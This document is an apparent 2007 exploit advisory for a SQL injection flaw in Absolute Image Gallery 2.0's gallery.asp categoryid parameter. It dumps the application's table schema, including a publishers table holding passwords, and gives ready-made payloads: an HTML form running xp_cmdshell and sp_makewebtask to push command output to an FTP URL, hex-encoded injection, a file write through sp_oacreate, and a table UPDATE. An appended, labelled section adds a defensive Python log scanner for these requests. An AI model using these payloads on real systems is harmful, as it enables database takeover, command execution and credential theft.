2007-03-15 Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln
Rated as : Moderate Risk

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-15}

Product / Vendor :

Absolute Image Gallery

http://www.xigla.com/absoluteig/

Bug :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-

---------------------------------------------------------------------------------------------------------------------------------------------

Script Table/Column Names :

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : articlefiles

fileid
filetitle
filename
articleid
filetype
filecomment
urlfile

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : articles

articleid
posted
lastupdate
headline
headlinedate
startdate
enddate
source
summary
articleurl
article
status
autoformat
publisherid
clicks
editor
relatedid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : iArticlesZones

articleid
zoneid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : plugins

pluginid
pplname
pplfile
ppldescription

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : PPL1reviews

reviewid
articleid
name
reviewdate
review
comments
isannonymous

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : publishers

publisherid
name
username
password
email
additional
plevel

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : publisherszones

publisherid
zoneid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGcategories

categoryid
catname
catdesc
supercatid
lastupdate
catpath
images
allowupload

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGimages

imageid
imagename
imagedesc
imagefile
imagedate
imagesize
totalrating
totalreviews
hits
categoryid
status
uploadedby
additionalinfo
embedhtml
keywords
copyright
credit
source
datecreated
email
infourl

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGpostcards

dateposted
postcardid
imageid
bgcolor
bordercolor
fonttype
fontcolor
recipientname
recipientemail
greeting
bgsound
sendername
senderemail
sendermsg

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : zones

zonename
description
template
articlespz
zonefont
fontsize
fontcolor
showsource
showsummary
showdates
showtn
textalign
displayhoriz
cellcolor
targetframe

---------------------------------------------------------------------------------------------------------------------------------------------

MSSQL CMD Injection Exploit(For DBO Users) :

<title>Absolute Image Gallery MSSQL CMD Injection
Exploit</title>
<body bgcolor="#000000">
<form name="Form" method="get"
action="http://localhost/script/gallery.asp">
<center><font face="Verdana" size="2"
color="#FF0000"><b>Absolute Image Gallery MSSQL CMD
Injection
Exploit</b></font><br><br></center>
<center><font face="Verdana" size="1"
color="#00FF00"><b>Note : For DBO
Users</b></font><br><br></center>
<center><font face="Verdana" size="1"
color="#00FF00"><b>Example
:</b></font><br><br></center>
  <tr>
    <center><img
src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
    <center><td align="right"><font
face="Arial" size="1"
color="#00FF00">Command Exec :</td>
    <td> </td>
    <td><input name="action=viewimage&categoryid=-1"
type="text" value=";exec master..xp_cmdshell 'dir c:\ >
cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM
'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--"
class="inputbox" style="color: #000000"
style="width:300px; "></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial"
size="1" color="#00FF00">Search Board</td>
    <td> </td>
    <td>
      <select name="">
        <option value="0">(CMD)</option>
      </select> <br><br>
      <input type="submit"
value="Apply"></center>
    </td>
  </tr>
</table>
</form>
<center><font face="Verdana" size="2"
color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2"
color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2"
color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

---------------------------------------------------------------------------------------------------------------------------------------------

Code Injection(For DBO Users) :

Add Table :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--

ASCII Code Add Database :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--

Code Injection :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--

---------------------------------------------------------------------------------------------------------------------------------------------

UPDATE(ALL users) :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE
table SET colon = 'x';--

---------------------------------------------------------------------------------------------------------------------------------------------

Tested :

Absolute Image Gallery 2.0

Vulnerable :

Absolute Image Gallery 2.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

securitydot.net - 2007-03-15
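
Added example (not part of the original advisory): every request shown above carries its SQL in the categoryid parameter of gallery.asp, so a web-log check can flag any categoryid that is not a plain integer and rank hits by the MSSQL procedures the advisory names. The log layout, the sample lines and the assumption that legitimate categoryid values are integers are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in a simplified W3C layout (not from the original page):
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = [
    "2007-03-16 10:01:02 GET /script/gallery.asp action=viewimage&categoryid=12 192.0.2.10 200",
    "2007-03-16 10:01:05 GET /script/gallery.asp action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);-- 192.0.2.66 200",
    "2007-03-16 10:01:09 GET /script/gallery.asp action=viewimage&categoryid=-1;exec+master..xp_cmdshell+'dir';-- 192.0.2.66 500",
    "2007-03-16 10:01:14 GET /script/gallery.asp action=viewimage&categoryid=-1%3Bdeclare+%40q+varchar(8000) 192.0.2.66 500",
    "2007-03-16 10:02:00 GET /script/default.asp page=2 192.0.2.10 200",
]

# Procedures and statements named in the advisory; used only to rank a finding.
MARKERS = ("xp_cmdshell", "sp_makewebtask", "sp_oacreate", "sp_oamethod", "bulk insert")
# Assumption: a legitimate categoryid is an optionally signed integer.
INTEGER = re.compile(r"-?\d+\Z")

def category_value(query):
    """Return the URL-decoded categoryid from a raw query string, or None."""
    # Split on '&' only, so a ';' inside the value stays part of the value.
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == "categoryid":
            return unquote_plus(value)
    return None

def scan(lines, page="/script/gallery.asp"):
    """Flag requests to `page` whose categoryid is not a plain integer."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 7 or fields[3].lower() != page:
            continue
        value = category_value(fields[4])
        if value is None or INTEGER.match(value):
            continue
        lowered = value.lower()
        findings.append({
            "time": fields[0] + " " + fields[1],
            "client": fields[5],
            "status": fields[6],
            "value": value,
            "markers": [m for m in MARKERS if m in lowered],
        })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["client"], f["status"], f["markers"] or "non-integer", f["value"])
```

The integer check is what catches the request; the marker list only separates table and variable manipulation from the DBO-level command and file-write attempts, including the URL-encoded variant.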
